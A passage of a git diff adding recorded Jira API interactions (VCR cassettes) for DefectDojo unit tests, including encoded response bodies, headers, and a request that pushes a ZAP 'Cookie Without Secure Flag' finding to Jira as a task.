b9wfhelo8FOcxLHx0djQqwqsmj19NPfRz9hpdK92Cwoqk6wyEUHpsTdhuVcrkJ7S6KinZ0R7HIAq + TwtvAt5Eijlwj4oFD70TCfgG6k1W3m9MEu9GTPWCSPACPOBxoT2TD09Ij0IBGkJjPRP8ThbveQUr + SQ4qMjfU5h0qgoploXrIUZvBAao6Q4lJYT3RRM398ZQUCp46vmYIkwpT7o95XRQdv5LiOxrbM5bN + 7e2R/F/6N47dcaY1KjBoa27f4ht+t2dVEy7jOSurgiFeaON8xycPRBOJobIA6o2WvdF73FWQ1RJa + V52So4rRQ+vnZyc4N8tebDCa9pZpb2/Fiv0Dh6okRfFZNf/fsJUMlsngY7aWrbHm4w1r3XTZTT9m + rUT81iVaaz52Wnt6MtW+/Oa4BjP219+YwTyXkGOFvIIhYkoUtSs6J8lqLLjSEsY9WkiHuzZGr3U4 + InHShZBzS4b+OEga9jAIlixz5h5fyQy+0H01E3VBT5mqCrLalBAGSn9jsDDIbEwQjbzraO3Ha8hx + 5polI6dNmgKxnyeiNnGyvv9pBIzn/ljL2jiTOcLZyprDcDRKWtZ8GbV4VziTXRvpro3uhkuYkEyv + 9gxEez3qfoAVGyUMBQ6iz3nxDytrmarr23xOwFCKAejLpw12vNkU7faNXTBNRiYqM6IMM18wPrd9 + +xQq08Z51uLLom5h99YSLvgZdg0yKeAaiHKYlc2Xf3Vx9+v55f3F+cnZ5c3Z/dn19ddrfB/Wl8Kw + 4IHbGXhXSKpce8aux5QneLHysGBZYZSaRma71ZWEEqNj250KbQm/fMUBKoz/ZXHcHT2MfddPMIOY + gk3FPatyTEbOOCleHmqGkCbutgYK9K4lCsxujl22PV1XpqTfAXM3VuwJQHd53cyeTwI/hskN4n4h + 2RynrhZyrXJn66SZfz7kcDtERWljJG17L4eFKX1RCHnpvJkUNQS5RD5bO3grvFPhki3KCudCrpss + vJW/58FZAMwRUsBzxFxpeP01dHYxTpK8U0G6Z5ScHltTX63DJsNYwQhCguFYh2CTIdzcgn3kOT+f + LQNLGEGyxcNe+0QTOS0x85arTTN5ebS/Ixrxzo1dlBOvKce2bcu/2w+uO+WzCn2ZWaI1yWY2B9s4 + ESf71lxdlsRgd3v2TGcScs+cGQo6Illmeh/OFP0p6XVpMhn14v4EnRgOD5I0HZhCWh9CC28cw59F + rDimFG0guv2ND0Ez5fwsFkRVoZCmVN8eNd14FGIZ2WMh1k3kPqN+kiY9SGLopvRgkHWz/jDJRn1K + YzKYJjA6oodWy6fu8af0C/65e0FJeBO6IHAiFdYqWGBEgjREF2lY1ZMCx/z/AAAA///sWLEOgjAQ + /Rd2tHFwcDPB3Tg4uBFtFGMoKYWYEP7dd71SBUJijFEGtkK56x1w7947vLIwi+Oc3hjsE/DpBH0C + y2gbLmdZSvF3Oez4I+4y4fFH3GXTY48YIHRiLut6QWRrAMh3VWj9LAOpnkxSSiaYDGQH9AQ8vim0 + gmg+AGKOl2fhkXrDrq9kOsfJTtdGtMyUNnKCgj989AkKfhHxBAWDUOCpBkI8c8VVNPhxawG/ysTg + 1KJPkkCUV0FVB/2NIZEqhkSq8CK1u+E5m0zLRKuUiY8juYWbSfLlOymUynxtEsC+vE8cBP24V1YI + NdMI/FoccdUsHep+fL6d3s4bv1CS8X0n8+JGjl9ytRJGm7XhvGnMQjKHMvf328aLlrUzsNHWdf0A + AAD//wMAaNHN2toWAAA= + headers: + ATL-TraceId: + - e2cdbed2397baf46 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:58 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - d51fc54c-2332-4c22-977d-b59c036b3890 + x-envoy-upstream-service-time: + - '156' + status: + code: 200 + message: OK +version: 1 diff --git a/unittests/vcr/jira/JIRAConfigAndPushTestApi.test_engagement_epic_mapping_disabled_create_epic_and_push_findings.yaml b/unittests/vcr/jira/JIRAConfigAndPushTestApi.test_engagement_epic_mapping_disabled_create_epic_and_push_findings.yaml new file mode 100644 index 00000000000..b366b3aaba7 --- /dev/null +++ b/unittests/vcr/jira/JIRAConfigAndPushTestApi.test_engagement_epic_mapping_disabled_create_epic_and_push_findings.yaml @@ -0,0 +1,1654 @@ +interactions: +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPT0vEMBDFv0uutt1JmvRPbqIHFVmFdk8ikrYTrKRJaVNhWfa7m+Diepv35vfm + MSfSqRUPiyGSfHo/r3K3G1Bj7wf35TLljVrXUdnMoicJ+cZlHZ0NMAWgGWSQNvvb1+bhpb1u99vU + hYnItwglkMB7QgacjTtOaH17nDEcuDNuG0Ko20Yz/EaIjAHBL+a98hFkwGgKLGVFS6lkpcx5BgA3 + EOCQX3EJve04Xdk8BdoykJxLUWcir/7Yfnq02gWQF0KUmmqNyKu61opHjYqWrBAVC4KJvi7qfwXe + xIancVEkvqPVZvyz61W0T8RcJoL249CQ8/kHAAD//wMA52SJmloBAAA= + headers: + ATL-TraceId: + - aa37b90ef1d0f94d + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:59 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 04a154db-7cd9-4159-8acd-9f319d1b4f5b + x-envoy-upstream-service-time: + - '28' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - 45cb6b35cec5ab73 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:59 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - ae854b75-c35d-4824-8d14-4af1c5219bbd + x-envoy-upstream-service-time: + - '75' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/createmeta?projectKeys=NTEST&issuetypeNames=Task&expand=projects.issuetypes.fields + response: + body: + string: !!binary | + H4sIAAAAAAAAA+xWS0/jMBD+K1EOnCpCS8WiShVCy66EdoWQKFwQB5NMqKljBz/adBH/fT2JE7vQ + ZbPlsgd6qWcyj28envFzDFVJeBZP4lKKR0i1igf+OLl99gJUKQN6XQKKKGC55c21LtUkSTLIrUIm + HsU+0YwoRQnf56ATCUonpKTJKHFWk+GB/VkTFI22xALWlrqYfbuaWYqTAix5zanW1gA6JEuiibyW + zKJ6jsfH1fi4j38FqZHQ+m6MnJQ0m9aO9xrGOZLjgy/WzWhcjcY7G1b0F0xVQRjbU+7/HV/Do2p4 + 9DFfVevMHd7xdjiqDkcf81ZARk1hvbnDH729DMJuwS7aoV86C3XHjMKOQSIDlUpaaiq45Z5GdQIG + UUaVpjzVUUkhhUjk0UrIxT5qp4Lb/umDwqVgSWG1Jf4g2MPhsSNnFui0g+x7eEbUwlKGa0m4YkRD + drHxRZl7jadJTpiCgb9vOQWWYeu7g217ZYqCyDUeJTwZKsEKammsmkrnUBD8UvufxEpLyh/QwVpp + KJDjtF86cFeO096/VmIQz4k6g5wYpm8IM9ChEyVIgjnHstqq6vguLHYvZGGWOnCe6eGdIy/CzHYI + Q91eGO/s6GBMrCCrhT67cVvPtTbiSW3kBWuaiqIUHDiugbCoTuVNVYmUBDuH2npaFa8fVjkw6sv8 + 1TPbMgdyPesckyxDT4D+JBRiCfGW2mNkRGuSzguEtlNkgX4QWsD1oZ2Gok1oG9q9QkPMG/3VB/Tb + 6x+a8AjPAm4LMZTsibEbBW5t9BoErWwAsmV5gJedUAPOK/0DsLeNsNMQ+NgTxmnj3fzRjFuR6xWR + 9RykRcmonfS+pJ8vnm2+/tcXTz0z64nLKF/sODMD/derseH6a/HT0pBF9Yr0c3PDADFa4GxloKHn + qnm98JKSpguQJzY/0k4sdxdt1HtqLlZX5h4XyiXBb1O85CFbNRynWgO1bT/lxlbtyYBcT3vfYZzt + mN+cVjcgVcPeJcHLRjvMbmjTp/c7rSIn7LMbivaF3iykZjn9ZS3ZMjxwgH6RGQUyDKPTDpZPy+pW + j2ds9sZvAAAA//+8l81uwjAMx19l6p1kHeUyaeI0aQf2CGgKKEoyAUVNGezQd5+dL1rSTe1ScXUT + +5fG8d8emxsYnFpvbLPj8IBYtZVL94BeTA0ce8dXAVFlpeqbJve33xBWdzTE2doiEpZ5FQmGCM+q + VQ9dfG//VBEbm+aYmcP7QLVngmuKO7R3osAglZDgnegv1Ht34jdrxAhGpOBnpMGalnca2JjUYz4l + Y86nwbT1vgv6bmwedZ6MWkyDChnZ5VyVZw9ZJEMuJoOMUnRlbB51kTVr7HPbLzEN/Z6pAKVme9J1 + uTfD+gf0CHkxrIKxAxYhuzkzkw85fl+UJqLi/CDLI9Qh8qkq9izkjIMez1DfwxY7tEG0a7F7hUUP + 2B9kYZyK0HrK3p9Vecc23DaiA050I7rxKOK8tboZa/C87nuaTOXkkVpHVJ8EXG29HClJfSNlg53e + uvkBAAD//wMAc91BljkVAAA= + headers: + ATL-TraceId: + - 27fe60f913a5e15f + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:59 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - eb240bf7-e7fb-42ab-bff3-87d25cfc2c7e + x-envoy-upstream-service-time: + - '93' + status: + code: 200 + message: OK +- request: + body: '{"fields": {"project": {"key": "NTEST"}, "summary": "Zap1: Cookie Without + Secure Flag", "description": "\n\n\n\n\n\n*Title*: [Zap1: Cookie Without Secure + Flag|http://localhost:8080/finding/385]\n\n*Defect Dojo link:* http://localhost:8080/finding/385\n\n*Severity:* + Low \n\n*CWE:* Unknown\n\n\n\n*CVE:* Unknown\n\n\n*Product/Engagement/Test:* + [Security How-to|http://localhost:8080/product/2] / [weekly engagement|http://localhost:8080/engagement/3] + / [ZAP Scan|http://localhost:8080/test/111]\n\n*Branch/Tag:* None\n\n*BuildID:* + None\n\n*Commit hash:* None\n\n*Systems/Endpoints*: \n\n* https://mainsite.com:443\n* + https://mainsite.com\n* https://mainsite.com/dashboard\n\n*Description*:\nA + cookie has been set without the secure flag, which means that the cookie can + be accessed via unencrypted connections.\n\nReference: http://www.owasp.org/index.php/Testing_for_cookies_attributes_(OWASP-SM-002)\n\nURL: + https://mainsite.com/dashboard\nMethod: GET\nParameter: opvc\nEvidence: Set-Cookie: + opvc\n\nURL: https://mainsite.com/dashboard\nMethod: GET\nParameter: dmid\nEvidence: + Set-Cookie: dmid\n\nURL: https://mainsite.com\nMethod: GET\nParameter: sitevisitscookie\nEvidence: + Set-Cookie: sitevisitscookie\n\n\n*Mitigation*:\nWhenever a cookie contains + sensitive information or is a session token, then it should always be passed + using an encrypted channel. Ensure that the secure flag is set for cookies containing + such sensitive information.\n\n*Impact*:\nNo impact provided\n\n*Steps to reproduce*:\nNone\n\n*References*:\nCWE-614\nWASC-13\n\n\n*Defect + Dojo ID:* 385\n\n*Reporter:* [(admin) ()|mailto:]\n", "issuetype": {"name": + "Task"}, "priority": {"name": "Low"}}}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '1673' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: POST + uri: https://defectdojo.atlassian.net/rest/api/2/issue + response: + body: + string: '{"id":"10610","key":"NTEST-458","self":"https://defectdojo.atlassian.net/rest/api/2/issue/10610"}' + headers: + ATL-TraceId: + - 60c81e5f3e54c061 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:00 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 76455bd0-7e55-47fb-a061-e62248922157 + x-envoy-upstream-service-time: + - '413' + status: + code: 201 + message: Created +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/NTEST-458 + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - b518808e667a6df4 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:00 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - f335bc10-eacc-4a71-b764-0193b2034472 + x-envoy-upstream-service-time: + - '200' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: 